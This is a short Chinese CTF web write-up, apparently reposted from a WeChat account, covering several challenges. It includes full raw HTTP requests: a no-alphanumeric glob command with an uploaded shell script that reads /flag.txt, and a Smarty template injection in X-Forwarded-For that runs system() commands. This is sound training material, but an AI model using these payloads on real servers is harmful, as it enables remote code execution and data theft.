1.签到
直接右键查看源代码,over
2.easy_web1
3.easy_web2
抄的我p神的思路
POST /?shell=.%20%2F%3F%3F%3F%2F%3F%3F%3F%3F%3F%3F%3F%3F%5B%40-%5B%5D HTTP/1.1Host: cloudeci1.ichunqiu.comContent-Length: 206Cache-Control: max-age=0Origin: nullUpgrade-Insecure-Requests: 1DNT: 1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrLrIdoDjGOhHKAwUUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close------WebKitFormBoundaryrLrIdoDjGOhHKAwUContent-Disposition: form-data; name="upload"; filename="a.txt"Content-Type: text/plain#! /bin/shcat /flag.txt------WebKitFormBoundaryrLrIdoDjGOhHKAwU--
参考文章 https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html
4.super_hacker
测试发现,执行命令不能含有空格和i
用assert执行post里面的内容就可以了,先find一下,然后再cat。over
POST / HTTP/1.1Host: eci-.cloudeci1.ichunqiu.comPragma: no-cacheCache-Control: no-cacheOrigin: http://eci-.cloudeci1.ichunqiu.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36DNT: 1Accept: */*Via: 1.1 vegurX-Forwarded-For: {assert($smarty.post.a)}Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: __jsluid_h=f8c4073200e23f9fef8f14be5a907849Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 31a=system("find / -name 'flag'")
本文始发于微信公众号(漏洞推送):某卫生CTF-web-WriteUP
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论